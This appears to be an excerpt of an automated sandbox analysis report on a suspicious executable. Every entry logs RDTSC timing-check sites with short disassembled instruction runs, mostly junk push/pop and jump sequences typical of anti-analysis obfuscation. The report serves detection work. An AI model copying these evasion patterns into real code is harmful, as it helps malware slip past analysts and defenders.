                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | RDTSC instruction interceptor: First address: 39E256 second address: 39E25A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | RDTSC instruction interceptor: First address: 39F4AE second address: 39F4BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4785B0BF4Ah 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 39F4BE second address: 39F4DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F4784F102D4h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 39F4DA second address: 39F4E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 39F4E0 second address: 39F4E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 39F4E9 second address: 39F4ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 39F4ED second address: 39F50F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F4784F102D6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 39F50F second address: 39F515 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 39F515 second address: 39F533 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4784F102C6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f jno 00007F4784F102C6h 0x00000015 pop edx 0x00000016 jnp 00007F4784F102CCh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A289D second address: 3A28A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F4785B0BF46h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A28A9 second address: 3A28D5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007F4784F102CAh 0x00000012 pushad 0x00000013 popad 0x00000014 push edi 0x00000015 pop edi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F4784F102D2h 0x0000001d push ecx 0x0000001e pop ecx 0x0000001f rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A28D5 second address: 3A28DF instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4785B0BF46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 35C36C second address: 35C370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A64CD second address: 3A64D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A64D5 second address: 3A64D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A64D9 second address: 3A64F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4785B0BF59h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A668D second address: 3A66A0 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4784F102CEh 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A6C5A second address: 3A6C5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3AA263 second address: 3AA268 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3AA268 second address: 3AA26D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3AA26D second address: 3AA2B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007F4784F102CDh 0x00000012 mov eax, dword ptr [eax] 0x00000014 jnp 00007F4784F102D0h 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e pushad 0x0000001f jmp 00007F4784F102D2h 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3AA3DC second address: 3AA3E6 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4785B0BF4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3AA82A second address: 3AA830 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3AA930 second address: 3AA938 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3AA938 second address: 3AA93C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3AA93C second address: 3AA958 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4785B0BF52h 0x0000000f rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3AAF41 second address: 3AAF4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3AB0BA second address: 3AB0BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3AB0BE second address: 3AB0C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3AB0C4 second address: 3AB0C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3AB0C9 second address: 3AB0E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4784F102CBh 0x00000011 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3AB2A6 second address: 3AB2AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3AB2AA second address: 3AB2CC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4784F102D4h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pushad 0x00000011 popad 0x00000012 pop ecx 0x00000013 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3AB2CC second address: 3AB2D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3AB2D1 second address: 3AB2D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3AB376 second address: 3AB38E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4785B0BF54h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3AB38E second address: 3AB3B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push ebx 0x0000000d jmp 00007F4784F102D5h 0x00000012 pop ebx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3AB3B4 second address: 3AB3BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3AB3BA second address: 3AB3D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 stc 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F4784F102CAh 0x0000000f jo 00007F4784F102CCh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3AB8E2 second address: 3AB8E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3ADDA1 second address: 3ADDB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4784F102D1h 0x00000009 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3ADDB6 second address: 3ADE3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jng 00007F4785B0BF57h 0x0000000f push esi 0x00000010 jmp 00007F4785B0BF4Fh 0x00000015 pop esi 0x00000016 nop 0x00000017 call 00007F4785B0BF59h 0x0000001c push ebx 0x0000001d cld 0x0000001e pop esi 0x0000001f pop esi 0x00000020 push 00000000h 0x00000022 jp 00007F4785B0BF4Bh 0x00000028 call 00007F4785B0BF51h 0x0000002d jmp 00007F4785B0BF51h 0x00000032 pop edi 0x00000033 push 00000000h 0x00000035 call 00007F4785B0BF4Ah 0x0000003a add dword ptr [ebp+1246B792h], eax 0x00000040 pop edi 0x00000041 xchg eax, ebx 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 popad 0x00000048 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3ADE3E second address: 3ADE42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3ADE42 second address: 3ADE48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3ADE48 second address: 3ADE4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3ADE4E second address: 3ADE52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3ADE52 second address: 3ADE74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push edi 0x0000000e pop edi 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F4784F102D0h 0x00000017 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3ADAD3 second address: 3ADAD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3AE933 second address: 3AE937 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3AFE36 second address: 3AFE3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3AFE3A second address: 3AFE40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3AFE40 second address: 3AFE46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3AFE46 second address: 3AFE4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3AFE4A second address: 3AFE4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3B0821 second address: 3B088A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F4784F102C6h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F4784F102D9h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 popad 0x00000015 mov dword ptr [esp], eax 0x00000018 sub edi, dword ptr [ebp+122D2B94h] 0x0000001e push 00000000h 0x00000020 mov dword ptr [ebp+1246B792h], edi 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push ecx 0x0000002b call 00007F4784F102C8h 0x00000030 pop ecx 0x00000031 mov dword ptr [esp+04h], ecx 0x00000035 add dword ptr [esp+04h], 00000014h 0x0000003d inc ecx 0x0000003e push ecx 0x0000003f ret 0x00000040 pop ecx 0x00000041 ret 0x00000042 mov esi, dword ptr [ebp+122D1C79h] 0x00000048 push eax 0x00000049 js 00007F4784F102E3h 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 popad 0x00000053 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3B05CA second address: 3B05D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F4785B0BF46h 0x0000000a rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3B05D4 second address: 3B05E1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3B2EE8 second address: 3B2EED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3B3465 second address: 3B3469 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3B3469 second address: 3B346F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3B4523 second address: 3B4533 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4784F102CCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3AFBBD second address: 3AFBC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3B5506 second address: 3B550D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3B478B second address: 3B4798 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a push eax 0x0000000b pop eax 0x0000000c pop esi 0x0000000d rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3B6570 second address: 3B6574 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3B6574 second address: 3B6582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3B5765 second address: 3B5769 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3B5769 second address: 3B5774 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F4785B0BF46h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3B5844 second address: 3B585A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4784F102D2h 0x00000009 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3B585A second address: 3B585E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3B6582 second address: 3B6586 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3B6586 second address: 3B658C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3B658C second address: 3B6592 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3B6592 second address: 3B6596 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3B6596 second address: 3B661B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov dword ptr [ebp+122D38EEh], edi 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F4784F102C8h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 00000016h 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push eax 0x00000030 call 00007F4784F102C8h 0x00000035 pop eax 0x00000036 mov dword ptr [esp+04h], eax 0x0000003a add dword ptr [esp+04h], 00000014h 0x00000042 inc eax 0x00000043 push eax 0x00000044 ret 0x00000045 pop eax 0x00000046 ret 0x00000047 or edi, dword ptr [ebp+122D2DA4h] 0x0000004d pushad 0x0000004e call 00007F4784F102CEh 0x00000053 jbe 00007F4784F102C6h 0x00000059 pop edx 0x0000005a jnl 00007F4784F102C9h 0x00000060 or bl, 0000005Dh 0x00000063 popad 0x00000064 xchg eax, esi 0x00000065 pushad 0x00000066 jl 00007F4784F102C8h 0x0000006c push eax 0x0000006d push edx 0x0000006e jc 00007F4784F102C6h 0x00000074 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3B661B second address: 3B6640 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4785B0BF46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4785B0BF57h 0x00000013 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3B754D second address: 3B7551 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
